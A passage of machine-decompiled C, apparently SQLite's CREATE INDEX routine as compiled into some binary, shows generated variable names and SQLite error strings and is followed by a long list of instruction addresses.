																																_t728 = E00DB6210(0xa6, __eflags, 0, 0, 0);
																																_t1148 = _t1148 + 0xc;
																																_t1044 = _t728;
																															}
																															 *(_v96 + 0x2c) = _t1044;
																															_t931 =  *(_t1126 + 0x88);
																															__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t1126 + 0xc)) + 0x30)) - _t931;
																															if(__eflags > 0) {
																																 *(_t1126 + 0x88) = _t931 + 1;
																																_t932 = _t931 + _t931 * 4;
																																_t688 =  *((intOrPtr*)(_t1126 + 0x58));
																																 *((intOrPtr*)(_t688 + _t932 * 4)) = 0x87;
																																 *((intOrPtr*)(_t688 + 4 + _t932 * 4)) = _v92;
																																 *((intOrPtr*)(_t688 + 8 + _t932 * 4)) = _t884;
																																 *((intOrPtr*)(_t688 + 0xc + _t932 * 4)) = 2;
																																 *((intOrPtr*)(_t688 + 0x10 + _t932 * 4)) = 0;
																															} else {
																																E00DB6210(0x87, __eflags, _v92, _t884, 2);
																																_t1148 = _t1148 + 0xc;
																															}
																															__eflags = _a20;
																															if(_a20 == 0) {
																																_t1097 = 0;
																																__eflags = 0;
																															} else {
																																_t1056 =  *((intOrPtr*)(_v88 + 0x188)) +  *((intOrPtr*)(_v88 + 0x184));
																																_t721 =  *_v56;
																																_t950 = _t1056 - _t721;
																																_push(_t721);
																																__eflags =  *((char*)(_t1056 - 1)) - 0x3b;
																																_t723 =  !=  ? _t950 : _t950 - 1;
																																__eflags = _v40;
																																_push( !=  ? _t950 : _t950 - 1);
																																_t725 =  !=  ? " UNIQUE" : 0xec5dd4;
																																_t726 = E00D97470(_v108, "CREATE%s INDEX %.*s",  !=  ? " UNIQUE" : 0xec5dd4);
																																_t1148 = _t1148 + 0x14;
																																_t1097 = _t726;
																															}
																															_push(_t1097);
																															_push(_t884);
																															_push( *_v100);
																															_push( *_v96);
																															_push("sqlite_master");
																															E00DDA1A0(_t884, _v88, "INSERT INTO %Q.%s VALUES(\'index\',%Q,%Q,#%d,%Q);",  *((intOrPtr*)( *((intOrPtr*)(_v108 + 0x10)) + _v44)));
																															_t1148 = _t1148 + 0x20;
																															__eflags = _t1097;
																															if(_t1097 != 0) {
																																_t947 = _v108;
																																__eflags =  *(_t947 + 0x1d0);
																																if( *(_t947 + 0x1d0) == 0) {
																																	__eflags = _t1097 -  *((intOrPtr*)(_t947 + 0x128));
																																	if(_t1097 <  *((intOrPtr*)(_t947 + 0x128))) {
																																		L279:
																																		E00D95050(_t1097);
																																		_t1148 = _t1148 + 4;
																																	} else {
																																		__eflags = _t1097 -  *((intOrPtr*)(_t947 + 0x12c));
																																		if(_t1097 >=  *((intOrPtr*)(_t947 + 0x12c))) {
																																			goto L279;
																																		} else {
																																			 *_t1097 =  *(_t947 + 0x124);
																																			 *(_t947 + 0x124) = _t1097;
																																		}
																																	}
																																} else {
																																	E00D950C0(_t947, _t1097);
																																}
																															}
																															__eflags = _v76;
																															if(_v76 == 0) {
																																_t1094 = _v96;
																															} else {
																																_t885 = _v88;
																																E00DDEB20(_t885, _v96, _t884);
																																_t1149 = _t1148 + 4;
																																_t1098 =  *((intOrPtr*)(_t885 + 8));
																																_t940 =  *(_t1098 + 0x88);
																																_t1050 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t885 + 0x10)) + _v44 + 0xc)))) + 1;
																																__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t1098 + 0xc)) + 0x30)) - _t940;
																																if(__eflags > 0) {
																																	 *(_t1098 + 0x88) = _t940 + 1;
																																	_t941 = _t940 + _t940 * 4;
																																	_t708 =  *((intOrPtr*)(_t1098 + 0x58));
																																	 *((intOrPtr*)(_t708 + _t941 * 4)) = 0x66;
																																	 *((intOrPtr*)(_t708 + 4 + _t941 * 4)) = _v92;
																																	 *(_t708 + 8 + _t941 * 4) = 1;
																																	 *((intOrPtr*)(_t708 + 0xc + _t941 * 4)) = _t1050;
																																	 *((intOrPtr*)(_t708 + 0x10 + _t941 * 4)) = 0;
																																} else {
																																	E00DB6210(0x66, __eflags, _v92, 1, _t1050);
																																	_t1149 = _t1149 + 0xc;
																																}
																																_t1094 = _v96;
																																L00DB6640(_t1126, _v92, E00D97470(_v108, "name=\'%q\' AND type=\'index\'",  *_t1094));
																																_t1148 = _t1149 + 0x10;
																																_t943 =  *(_t1126 + 0x88);
																																__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t1126 + 0xc)) + 0x30)) - _t943;
																																if(__eflags > 0) {
																																	 *(_t1126 + 0x88) = _t943 + 1;
																																	_t944 = _t943 + _t943 * 4;
																																	_t713 =  *((intOrPtr*)(_t1126 + 0x58));
																																	 *((intOrPtr*)(_t713 + _t944 * 4)) = 0x97;
																																	 *((intOrPtr*)(_t713 + 4 + _t944 * 4)) = 0;
																																	 *((intOrPtr*)(_t713 + 8 + _t944 * 4)) = 0;
																																	 *((intOrPtr*)(_t713 + 0xc + _t944 * 4)) = 0;
																																	 *((intOrPtr*)(_t713 + 0x10 + _t944 * 4)) = 0;
																																} else {
																																	E00DB6210(0x97, __eflags, 0, 0, 0);
																																	_t1148 = _t1148 + 0xc;
																																}
																															}
																															_t694 =  *_t1126;
																															_t1046 =  *(_t1126 + 0x88);
																															_t934 =  *(_t1094 + 0x2c);
																															__eflags =  *((char*)(_t694 + 0x49));
																															if( *((char*)(_t694 + 0x49)) == 0) {
																																__eflags = _t934;
																																_t696 =  >=  ? _t934 : _t1046 - 1;
																																_t935 = ( >=  ? _t934 : _t1046 - 1) + _t696 * 4;
																																_t698 =  *((intOrPtr*)(_t1126 + 0x58)) + (( >=  ? _t934 : _t1046 - 1) + _t696 * 4) * 4;
																															} else {
																																_t698 = 0xedf080;
																															}
																															_t1112 = _v108;
																															_t927 = _v100;
																															 *(_t698 + 8) = _t1046;
																															goto L292;
																														} else {
																															__eflags =  *(_t1041 + 0x78) - _t1126;
																															if(__eflags == 0) {
																																__eflags =  *( *_t1041 + 0x44) & 0x00000008;
																																if(__eflags == 0) {
																																	 *((char*)(_t1041 + 0x17)) = 1;
																																}
																															}
																															_t1126 = L00DB5FB0(_t1041, _t1041, __eflags);
																															__eflags = _t1126;
																															if(_t1126 == 0) {
																																goto L190;
																															} else {
																																_t1041 = _v88;
																																goto L261;
																															}
																														}
																													} else {
																														__eflags = _v76;
																														if(_v76 == 0) {
																															L292:
																															_t1047 = _v76;
																															goto L293;
																														} else {
																															goto L255;
																														}
																													}
																												} else {
																													_t732 = L00D99750( *((intOrPtr*)(_t1094 + 0x18)) + 0x18,  *_t1094, _t1094);
																													_t1148 = _t1148 + 4;
																													__eflags = _t732;
																													if(_t732 == 0) {
																														 *(_t1112 + 0x18) =  *(_t1112 + 0x18) | 0x00000001;
																														_t1047 = _v76;
																														_t927 = _v100;
																														__eflags = _t1047;
																														if(_t1047 != 0) {
																															 *(_t1094 + 0x2c) =  *(_t1112 + 0x98);
																														}
																														L293:
																														__eflags =  *((char*)(_t1112 + 0x9d));
																														if( *((char*)(_t1112 + 0x9d)) != 0) {
																															L295:
																															__eflags = _v40 - 5;
																															if(_v40 != 5) {
																																L302:
																																_t936 = _v100;
																																 *(_t1094 + 0x14) =  *(_t936 + 8);
																																 *(_t936 + 8) = _t1094;
																																goto L91;
																															} else {
																																_t937 =  *(_t927 + 8);
																																__eflags = _t937;
																																if(_t937 == 0) {
																																	goto L302;
																																} else {
																																	__eflags =  *((char*)(_t937 + 0x36)) - 5;
																																	if( *((char*)(_t937 + 0x36)) == 5) {
																																		goto L302;
																																	} else {
																																		_t700 =  *(_t937 + 0x14);
																																		__eflags = _t700;
																																		if(_t700 != 0) {
																																			while(1) {
																																				__eflags =  *((char*)(_t700 + 0x36)) - 5;
																																				if( *((char*)(_t700 + 0x36)) == 5) {
																																					goto L301;
																																				}
																																				_t937 = _t700;
																																				_t700 =  *(_t937 + 0x14);
																																				__eflags = _t700;
																																				if(_t700 != 0) {
																																					continue;
																																				}
																																				goto L301;
																																			}
																																		}
																																		L301:
																																		 *(_t1094 + 0x14) =  *(_t937 + 0x14);
																																		 *(_t937 + 0x14) = _t1094;
																																		goto L91;
																																	}
																																}
																															}
																														} else {
																															__eflags = _t1047;
																															if(_t1047 != 0) {
																																goto L304;
																															} else {
																																goto L295;
																															}
																														}
																													} else {
																														__eflags =  *((char*)(_t1112 + 0x49));
																														if( *((char*)(_t1112 + 0x49)) == 0) {
																															__eflags =  *((char*)(_t1112 + 0x4a));
																															if( *((char*)(_t1112 + 0x4a)) == 0) {
																																__eflags =  *(_t1112 + 0xac);
																																 *((char*)(_t1112 + 0x49)) = 1;
																																if( *(_t1112 + 0xac) > 0) {
																																	 *(_t1112 + 0x100) = 1;
																																}
																																 *((intOrPtr*)(_t1112 + 0x108)) =  *((intOrPtr*)(_t1112 + 0x108)) + 1;
																															}
																														}
																														goto L304;
																													}
																												}
																											} else {
																												_t886 =  *(_t927 + 8);
																												_v80 = _t886;
																												__eflags = _t886;
																												if(_t886 != 0) {
																													_t959 =  *(_t1094 + 0x32) & 0x0000ffff;
																													do {
																														_t734 =  *(_t886 + 0x32) & 0x0000ffff;
																														__eflags = _t734 - _t959;
																														if(_t734 != _t959) {
																															goto L233;
																														} else {
																															_t1060 = _t734;
																															_t960 = 0;
																															_v72 = 0;
																															_v68 = _t1060;
																															__eflags = _t1060;
																															if(_t1060 != 0) {
																																_t1100 =  *((intOrPtr*)(_t1094 + 4));
																																_t743 =  *((intOrPtr*)(_t886 + 4)) - _t1100;
																																__eflags = _t743;
																																_v36 = _t743;
																																while(1) {
																																	__eflags =  *((intOrPtr*)(_t743 + _t1100)) -  *_t1100;
																																	if( *((intOrPtr*)(_t743 + _t1100)) !=  *_t1100) {
																																		break;
																																	}
																																	_t1061 =  *((intOrPtr*)( *((intOrPtr*)(_t886 + 0x20)) + _t960 * 4));
																																	_t887 =  *_t1061;
																																	_t1127 =  *( *((intOrPtr*)(_v96 + 0x20)) + _t960 * 4);
																																	_t748 = _t887 & 0x000000ff;
																																	_t749 =  *_t1127 & 0x000000ff;
																																	__eflags = ( *(_t748 + 0xecc550) & 0x000000ff) != ( *(_t749 + 0xecc550) & 0x000000ff);
																																	if(( *(_t748 + 0xecc550) & 0x000000ff) != ( *(_t749 + 0xecc550) & 0x000000ff)) {
																																		L229:
																																		_t1060 = _v68;
																																		_t886 = _v80;
																																		_t960 = _v72;
																																	} else {
																																		_t1128 = _t1127 - _t1061;
																																		__eflags = _t1128;
																																		while(1) {
																																			__eflags = _t887;
																																			if(_t887 == 0) {
																																				break;
																																			}
																																			_t751 =  *(_t1061 + _t1128 + 1) & 0x000000ff;
																																			_t1061 = _t1061 + 1;
																																			_t887 =  *_t1061;
																																			_t752 = _t887 & 0x000000ff;
																																			__eflags = ( *(_t752 + 0xecc550) & 0x000000ff) == ( *(_t751 + 0xecc550) & 0x000000ff);
																																			if(( *(_t752 + 0xecc550) & 0x000000ff) == ( *(_t751 + 0xecc550) & 0x000000ff)) {
																																				continue;
																																			} else {
																																				goto L229;
																																			}
																																			goto L230;
																																		}
																																		_t1100 = _t1100 + 2;
																																		_t1060 = _v68;
																																		_t960 = _v72 + 1;
																																		_t886 = _v80;
																																		_t743 = _v36;
																																		_v72 = _t960;
																																		__eflags = _t960 - _t1060;
																																		if(_t960 < _t1060) {
																																			continue;
																																		} else {
																																		}
																																	}
																																	break;
																																}
																																L230:
																																_t1094 = _v96;
																															}
																															__eflags = _t960 - _t1060;
																															if(_t960 == _t1060) {
																																_t735 =  *((intOrPtr*)(_t886 + 0x36));
																																_t961 =  *((intOrPtr*)(_t1094 + 0x36));
																																__eflags = _t735 - _t961;
																																if(_t735 != _t961) {
																																	__eflags = _t735 - 0xa;
																																	if(_t735 == 0xa) {
																																		L248:
																																		 *((char*)(_t886 + 0x36)) =  *((intOrPtr*)(_t1094 + 0x36));
																																	} else {
																																		__eflags = _t961 - 0xa;
																																		if(__eflags != 0) {
																																			E00D981E0(__eflags, _v88, "conflicting ON CONFLICT clauses specified", 0);
																																			_t1148 = _t1148 + 0xc;
																																			__eflags =  *((intOrPtr*)(_t886 + 0x36)) - 0xa;
																																			if( *((intOrPtr*)(_t886 + 0x36)) == 0xa) {
																																				goto L248;
																																			}
																																		}
																																	}
																																}
																																__eflags = _a36 - 2;
																																_t1112 = _v108;
																																if(_a36 == 2) {
																																	 *(_t886 + 0x38) =  *(_t886 + 0x38) & 0xfffffffe | 0x00000002;
																																}
																																goto L304;
																															} else {
																																_t959 =  *(_t1094 + 0x32) & 0x0000ffff;
																																goto L233;
																															}
																														}
																														goto L93;
																														L233:
																														_t886 =  *(_t886 + 0x14);
																														_v80 = _t886;
																														__eflags = _t886;
																													} while (_t886 != 0);
																													_t1041 = _v88;
																													_t927 = _v100;
																												}
																												goto L235;
																											}
																										} else {
																											_v52 = 0;
																											while(1) {
																												_t772 =  *_t1124;
																												_t971 =  *_t772;
																												__eflags = _t971 - 0x61;
																												if(__eflags == 0) {
																													goto L149;
																												}
																												__eflags = _t971 - 0x5e;
																												if(__eflags == 0) {
																													_t772 =  *((intOrPtr*)(_t772 + 0xc));
																													__eflags =  *_t772 - 0x61;
																													if(__eflags == 0) {
																														goto L149;
																													}
																												}
																												L150:
																												E00DCB6A0(_v88, _t1040, __eflags, 0x20,  *_t1124, 0);
																												_t973 = _v88;
																												_t1148 = _t1148 + 0xc;
																												__eflags =  *(_t973 + 0x24);
																												if( *(_t973 + 0x24) != 0) {
																													L190:
																													_t1112 = _v108;
																													L304:
																													_t656 = _v96;
																													__eflags = _t656;
																													if(_t656 != 0) {
																														E00DDA6B0(_t1112, _t656);
																													}
																													goto L91;
																												} else {
																													_t774 =  *_t1124;
																													__eflags = _t774;
																													if(_t774 != 0) {
																														while(1) {
																															_t983 =  *(_t774 + 4);
																															__eflags = _t983 & 0x00001000;
																															if((_t983 & 0x00001000) == 0) {
																																break;
																															}
																															__eflags = _t983 & 0x00040000;
																															if((_t983 & 0x00040000) == 0) {
																																_t774 =  *(_t774 + 0xc);
																															} else {
																																_t774 =  *( *((intOrPtr*)(_t774 + 0x14)) + 4);
																															}
																															__eflags = _t774;
																															if(_t774 != 0) {
																																continue;
																															}
																															break;
																														}
																														_t973 = _v88;
																													}
																													__eflags =  *_t774 - 0x91;
																													if( *_t774 == 0x91) {
																														_t1066 =  *((short*)(_t774 + 0x20));
																														_t775 = _v100;
																														__eflags = _t1066;
																														if(_t1066 >= 0) {
																															_t776 =  *((intOrPtr*)(_t775 + 4));
																															_t975 = _t1066 + _t1066;
																															__eflags =  *((char*)(_t776 + 0xc + _t975 * 8));
																															if( *((char*)(_t776 + 0xc + _t975 * 8)) == 0) {
																																_t273 = _t1094 + 0x38;
																																 *_t273 =  *(_t1094 + 0x38) & 0xfffffff7;
																																__eflags =  *_t273;
																															}
																														} else {
																															_t1066 =  *((short*)(_t775 + 0x28));
																														}
																														 *( *((intOrPtr*)(_t1094 + 4)) + _t883 * 2) = _t1066;
																														goto L169;
																													} else {
																														__eflags = _v100 -  *((intOrPtr*)(_t973 + 0x1b0));
																														if(__eflags == 0) {
																															_push("expressions prohibited in PRIMARY KEY and UNIQUE constraints");
																															_push(_t973);
																															E00D981E0(__eflags);
																															_t1148 = _t1148 + 8;
																															goto L190;
																														} else {
																															__eflags =  *(_t1094 + 0x28);
																															if( *(_t1094 + 0x28) == 0) {
																																_t796 = E00DCD020(_v108, _v104, 0);
																																_t982 = _v108;
																																_t1148 = _t1148 + 4;
																																 *(_t1094 + 0x28) = _t796;
																																__eflags =  *((char*)(_t982 + 0x49));
																																if( *((char*)(_t982 + 0x49)) == 0) {
																																	_t1124 = _v52 + 4 + _t796;
																																	__eflags = _t1124;
																																	_v68 = _t1124;
																																}
																															}
																															_t1066 = 0xfffffffe;
																															 *( *((intOrPtr*)(_t1094 + 4)) + _t883 * 2) = 0xfffffffe;
																															 *(_t1094 + 0x38) =  *(_t1094 + 0x38) & 0xfffffff7;
																															L169:
																															_t778 =  *_t1124;
																															__eflags =  *_t778 - 0x5e;
																															if( *_t778 != 0x5e) {
																																__eflags = _t1066;
																																if(_t1066 < 0) {
																																	goto L179;
																																} else {
																																	_t1069 = _t1066 + _t1066;
																																	__eflags = _t1069;
																																	_t1103 =  *( *((intOrPtr*)(_v100 + 4)) + 8 + _t1069 * 8);
																																	goto L178;
																																}
																															} else {
																																_t979 =  *(_t778 + 8);
																																__eflags = _t979;
																																if(_t979 != 0) {
																																	_t1131 = _t979;
																																	_t1070 = _t1131 + 1;
																																	do {
																																		_t790 =  *_t1131;
																																		_t1131 = _t1131 + 1;
																																		__eflags = _t790;
																																	} while (_t790 != 0);
																																	_t1133 = _t1131 - _t1070 & 0x3fffffff;
																																	__eflags = _t1133;
																																} else {
																																	_t1133 = 0;
																																}
																																_t1103 = _v60;
																																_t1134 = _t1133 + 1;
																																L00E79650(_t1103, _t979, _t1134);
																																_t1148 = _t1148 + 0xc;
																																_t1124 = _v68;
																																_v60 = _t1134 + _t1103;
																																L178:
																																__eflags = _t1103;
																																if(_t1103 == 0) {
																																	L179:
																																	_t1103 = "BINARY";
																																}
																															}
																															_t779 = _v108;
																															__eflags =  *((char*)(_t779 + 0x9d));
																															if( *((char*)(_t779 + 0x9d)) != 0) {
																																L187:
																																 *( *((intOrPtr*)(_v96 + 0x20)) + _t883 * 4) = _t1103;
																																__eflags = _v61 - 4;
																																_t1094 = _v96;
																																_t924 =  <  ? 0 :  *(_t1124 + 0xc) & 0x000000ff;
																																_v52 = _v52 + 0x18;
																																_t1124 = _t1124 + 0x18;
																																_v68 = _t1124;
																																 *(_t883 +  *((intOrPtr*)(_t1094 + 0x1c))) = _t924;
																																_t883 = _t883 + 1;
																																_v80 = _t883;
																																__eflags = _t883 -  *_v104;
																																if(_t883 >=  *_v104) {
																																	goto L191;
																																} else {
																																	_t1040 = _v100;
																																	continue;
																																}
																															} else {
																																_t892 =  *((intOrPtr*)( *_v88 + 0x46));
																																_t787 = E00DE2B00( *_v88, _t892, _t1103, _t892 & 0x000000ff);
																																_t1148 = _t1148 + 8;
																																__eflags = _t892;
																																if(_t892 != 0) {
																																	L185:
																																	__eflags = _t787;
																																	if(_t787 == 0) {
																																		goto L190;
																																	} else {
																																		goto L186;
																																	}
																																} else {
																																	__eflags = _t787;
																																	if(_t787 == 0) {
																																		L184:
																																		_t787 = E00DE2880(_v88, _t892, _t787, _t1103);
																																		_t1148 = _t1148 + 8;
																																		goto L185;
																																	} else {
																																		__eflags =  *(_t787 + 0xc);
																																		if( *(_t787 + 0xc) != 0) {
																																			L186:
																																			_t883 = _v80;
																																			goto L187;
																																		} else {
																																			goto L184;
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																												goto L93;
																												L149:
																												 *_t772 = 0x3b;
																												goto L150;
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				} else {
																					__eflags = _a32;
																					if(__eflags != 0) {
																						_t823 =  *(_t882 + 0x78);
																						_t1000 = _v92;
																						__eflags = _t823;
																						_t894 =  !=  ? _t823 : _t882;
																						_t1077 = 1 << _t1000;
																						_t824 =  *(_t894 + 0x5c);
																						__eflags = _t824 & _t1077;
																						if((_t824 & _t1077) == 0) {
																							asm("bts eax, ecx");
																							 *(_t894 + 0x5c) = _t824;
																							__eflags = _t1000 - 1;
																							if(_t1000 == 1) {
																								E00DE1990(_t894);
																							}
																						}
																						_t1112 = _t1093;
																						L91:
																						_t1088 = _v84;
																					} else {
																						_t1088 = _v84;
																						E00D981E0(__eflags, _t882, "index %s already exists", _t1088);
																						_t1112 = _v108;
																						_t1148 = _t1148 + 0xc;
																					}
																					goto L92;
																				}
																			} else {
																				_t827 = E00DDA330(_t1112, _t1088, _t821);
																				_t1148 = _t1148 + 4;
																				__eflags = _t827;
																				if(__eflags == 0) {
																					goto L84;
																				} else {
																					E00D981E0(__eflags, _t882, "there is already a table named %s", _t1088);
																					_t1148 = _t1148 + 0xc;
																					goto L92;
																				}
																			}
																		}
																	}
																} else {
																	__eflags = 0;
																	E00D982D0(0);
																	L75:
																	_t1112 = _v108;
																	goto L92;
																}
															}
														} else {
															_push("virtual tables may not be indexed");
															goto L69;
														}
													} else {
														_push("views may not be indexed");
														L69:
														_push(_v88);
														E00D981E0(__eflags);
														_t1112 = _v108;
														_t1148 = _t1148 + 8;
														_t1088 = 0;
														goto L92;
													}
												} else {
													goto L54;
												}
											}
										}
									} else {
										_t1112 = _v108;
										__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t1112 + 0x10)) + 0x1c)) -  *(_t1092 + 0x48);
										if(__eflags == 0) {
											goto L33;
										} else {
											E00D981E0(__eflags, _t876, "cannot create a TEMP index on non-TEMP table \"%s\"",  *_t1092);
											_t1148 = _t1148 + 0xc;
											_t1088 = 0;
											goto L92;
										}
									}
								}
							} else {
								__eflags =  *((char*)(_t849 + 0x9d));
								if(__eflags == 0) {
									_v56 = _t1087;
									_t871 = L00DDAF70(_t849, _t1111);
									_v92 = _t871;
									__eflags = _t871;
									if(__eflags >= 0) {
										_t1023 = _v76;
										goto L17;
									} else {
										E00D981E0(__eflags, _t876, "unknown database %T", _t1111);
										_t1112 = _v108;
										_t1148 = _t1148 + 0xc;
										_t1088 = 0;
										goto L92;
									}
								} else {
									_push("corrupt database");
									_push(_t876);
									E00D981E0(__eflags);
									_t1112 = _v108;
									_t1148 = _t1148 + 8;
									_t1088 = 0;
									goto L92;
								}
							}
						}
					} else {
						_t874 = E00DF7930(_t628, _t876 + 4);
						if(_t874 == 0) {
							_t628 = _v108;
							_t1023 = _v76;
							goto L9;
						} else {
							 *((intOrPtr*)(_t876 + 0x24)) =  *((intOrPtr*)(_t876 + 0x24)) + 1;
							 *((intOrPtr*)(_t876 + 0xc)) = _t874;
							L7:
							_t1112 = _v108;
							_t1088 = 0;
							L92:
							_t877 = _v104;
						}
					}
				}
				L93:
				_t629 = _v48;
				if(_v48 != 0) {
					E00DCCB80(_t1112, _t629);
				}
				if(_t877 != 0) {
					E00DCDAB0(_t1112, _t877);
				}
				_t1024 = _v76;
				_t630 = E00DE1200(_t1112, _v76);
				if(_t1088 == 0) {
					L312:
					_pop(_t1089);
					_pop(_t1113);
					_pop(_t878);
					__eflags = _v8 ^ _t1148;
					return E00E76672(_t630, _t878, _v8 ^ _t1148, _t1024, _t1089, _t1113);
				} else {
					if( *((intOrPtr*)(_t1112 + 0x1d0)) == 0) {
						__eflags = _t1088 -  *((intOrPtr*)(_t1112 + 0x128));
						if(_t1088 <  *((intOrPtr*)(_t1112 + 0x128))) {
							L311:
							_t630 = E00D95050(_t1088);
							_t1148 = _t1148 + 4;
							goto L312;
						} else {
							__eflags = _t1088 -  *((intOrPtr*)(_t1112 + 0x12c));
							if(_t1088 >=  *((intOrPtr*)(_t1112 + 0x12c))) {
								goto L311;
							} else {
								 *_t1088 =  *(_t1112 + 0x124);
								 *(_t1112 + 0x124) = _t1088;
								_pop(_t1090);
								_pop(_t1114);
								_pop(_t879);
								__eflags = _v8 ^ _t1148;
								return E00E76672( *(_t1112 + 0x124), _t879, _v8 ^ _t1148, _t1024, _t1090, _t1114);
							}
						}
					} else {
						_t634 = E00D950C0(_t1112, _t1088);
						_pop(_t1091);
						_pop(_t1115);
						_pop(_t880);
						return E00E76672(_t634, _t880, _v8 ^ _t1148, _t1088, _t1091, _t1115);
					}
				}
			}

0x00ddf566
0x00ddf569
0x00ddf570
0x00ddf578
0x00ddf57a
0x00ddf583
0x00ddf58a
0x00ddf58e
0x00ddf591
0x00ddf593
0x00ddf597
0x00ddf59b
0x00ddf59e
0x00ddf5a2
0x00ddf5a6
0x00ddf5aa
0x00ddf5ae
0x00ddf5b2
0x00ddf5b9
0x00de06a6
0x00de06a8
0x00000000
0x00ddf5da
0x00ddf5e0
0x00ddf609
0x00ddf609
0x00ddf60b
0x00ddf7b6
0x00ddf7bc
0x00ddf7c0
0x00ddf7c2
0x00000000
0x00ddf7c8
0x00ddf7c8
0x00ddf7cb
0x00ddf7d3
0x00ddf7d5
0x00ddf7d7
0x00ddf7da
0x00ddf7dc
0x00ddf7e0
0x00ddf7e2
0x00ddf7e7
0x00ddf7ea
0x00ddf7f0
0x00ddf7f0
0x00ddf7f2
0x00000000
0x00000000
0x00ddf7f4
0x00ddf7f5
0x00ddf7f8
0x00ddf7fa
0x00000000
0x00000000
0x00000000
0x00ddf7fa
0x00ddf7fc
0x00ddf7fc
0x00ddf7e2
0x00000000
0x00ddf7d5
0x00ddf611
0x00ddf611
0x00ddf615
0x00ddf617
0x00ddf677
0x00ddf67b
0x00ddf67f
0x00ddf67f
0x00ddf683
0x00ddf68a
0x00ddf6b8
0x00ddf6b8
0x00ddf68c
0x00ddf68e
0x00ddf693
0x00ddf697
0x00000000
0x00ddf699
0x00ddf699
0x00ddf69d
0x00ddf69f
0x00ddf6a7
0x00ddf6af
0x00ddf6b2
0x00ddf6b2
0x00ddf69f
0x00ddf697
0x00ddf6c0
0x00ddf6c7
0x00ddf6ce
0x00ddf6d0
0x00ddf6da
0x00ddf6e5
0x00ddf6eb
0x00ddf6ee
0x00ddf6fb
0x00ddf6ff
0x00ddf704
0x00ddf707
0x00ddf709
0x00ddf73a
0x00ddf70b
0x00ddf70b
0x00ddf70d
0x00ddf70f
0x00ddf712
0x00ddf714
0x00ddf719
0x00ddf719
0x00ddf720
0x00ddf720
0x00ddf722
0x00000000
0x00000000
0x00ddf724
0x00ddf725
0x00ddf728
0x00ddf72a
0x00000000
0x00000000
0x00000000
0x00ddf72a
0x00ddf720
0x00ddf72c
0x00ddf731
0x00ddf735
0x00ddf735
0x00ddf74a
0x00ddf74c
0x00ddf74f
0x00ddf753
0x00ddf755
0x00000000
0x00ddf75b
0x00ddf75b
0x00ddf760
0x00ddf788
0x00ddf788
0x00ddf78c
0x00ddf78e
0x00ddf791
0x00ddf795
0x00ddf797
0x00ddf7a0
0x00ddf7a5
0x00ddf7a7
0x00000000
0x00000000
0x00ddf7a9
0x00ddf7ac
0x00ddf7ae
0x00000000
0x00000000
0x00000000
0x00ddf7ae
0x00ddf7b0
0x00ddf7b0
0x00ddf797
0x00ddf800
0x00ddf800
0x00ddf804
0x00ddf80d
0x00ddf80f
0x00ddf815
0x00ddf817
0x00ddf81b
0x00ddf81f
0x00ddf821
0x00ddf903
0x00000000
0x00ddf827
0x00ddf827
0x00ddf829
0x00ddf830
0x00ddf830
0x00ddf832
0x00ddf833
0x00ddf835
0x00000000
0x00000000
0x00ddf837
0x00ddf83a
0x00ddf843
0x00ddf849
0x00ddf84b
0x00ddf84c
0x00ddf84d
0x00ddf84f
0x00000000
0x00ddf851
0x00ddf851
0x00ddf851
0x00ddf851
0x00ddf84f
0x00000000
0x00ddf849
0x00ddf852
0x00ddf854
0x00ddf86e
0x00ddf86e
0x00ddf872
0x00ddf879
0x00ddf8f9
0x00ddf8fd
0x00000000
0x00ddf87b
0x00ddf87b
0x00ddf87e
0x00ddf883
0x00ddf885
0x00ddf8ce
0x00ddf8d8
0x00ddf8dd
0x00ddf8e1
0x00ddf8e4
0x00000000
0x00ddf887
0x00ddf887
0x00ddf890
0x00ddf890
0x00ddf892
0x00ddf893
0x00ddf895
0x00000000
0x00000000
0x00ddf897
0x00ddf89a
0x00ddf8a3
0x00ddf8a9
0x00ddf8ab
0x00ddf8ac
0x00ddf8ad
0x00ddf8af
0x00000000
0x00ddf8b1
0x00ddf8b1
0x00ddf8b1
0x00ddf8b1
0x00ddf8af
0x00000000
0x00ddf8a9
0x00ddf8b2
0x00ddf8b4
0x00000000
0x00ddf8b6
0x00ddf8ca
0x00ddf8cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00ddf8cc
0x00ddf8b4
0x00ddf885
0x00ddf856
0x00ddf856
0x00ddf860
0x00ddf86a
0x00ddf86c
0x00ddf8eb
0x00ddf8eb
0x00ddf8ef
0x00ddf8f3
0x00ddf905
0x00ddf905
0x00ddf909
0x00ddf927
0x00ddf92b
0x00ddf934
0x00ddf938
0x00ddf93a
0x00ddfaa7
0x00ddfaaa
0x00ddfaaf
0x00ddfab1
0x00ddfab3
0x00ddfab6
0x00ddfab7
0x00ddfab7
0x00ddfabb
0x00ddfac8
0x00ddfaca
0x00ddfacd
0x00ddfad1
0x00ddfad3
0x00000000
0x00ddfad9
0x00ddfad9
0x00ddfadd
0x00ddfae4
0x00ddfae6
0x00ddfae6
0x00ddfae6
0x00ddfae6
0x00ddfae9
0x00000000
0x00ddfae9
0x00ddf940
0x00ddf940
0x00ddf942
0x00ddf945
0x00ddf947
0x00ddf960
0x00ddf966
0x00ddf96b
0x00ddf96e
0x00ddf972
0x00ddf974
0x00ddf989
0x00ddf976
0x00ddf978
0x00ddf97b
0x00ddf980
0x00ddf983
0x00ddf983
0x00ddf98f
0x00ddf994
0x00ddf996
0x00000000
0x00ddf998
0x00ddf998
0x00ddf9a0
0x00ddf9a5
0x00ddf9a9
0x00ddf9ab
0x00000000
0x00ddf9b1
0x00ddf9b1
0x00ddf9b7
0x00ddf9db
0x00ddf9db
0x00ddf9e1
0x00ddf9e9
0x00ddf9ee
0x00ddf9f1
0x00ddf9f3
0x00ddfaed
0x00ddfaed
0x00ddfaf4
0x00ddfaff
0x00ddfb0c
0x00ddfb11
0x00ddfb14
0x00ddfb16
0x00de069d
0x00de069d
0x00000000
0x00ddfb1c
0x00ddfb1d
0x00ddfb23
0x00ddfb3a
0x00ddfb3f
0x00ddfb42
0x00ddfb44
0x00000000
0x00ddfb4a
0x00ddfb4a
0x00ddfb4e
0x00ddfb50
0x00ddfc34
0x00ddfc36
0x00ddfc39
0x00ddfc46
0x00ddfc4b
0x00ddfc4f
0x00000000
0x00ddfc4f
0x00000000
0x00ddfb56
0x00ddfb5f
0x00ddfb63
0x00ddfb65
0x00ddfb6b
0x00ddfb6d
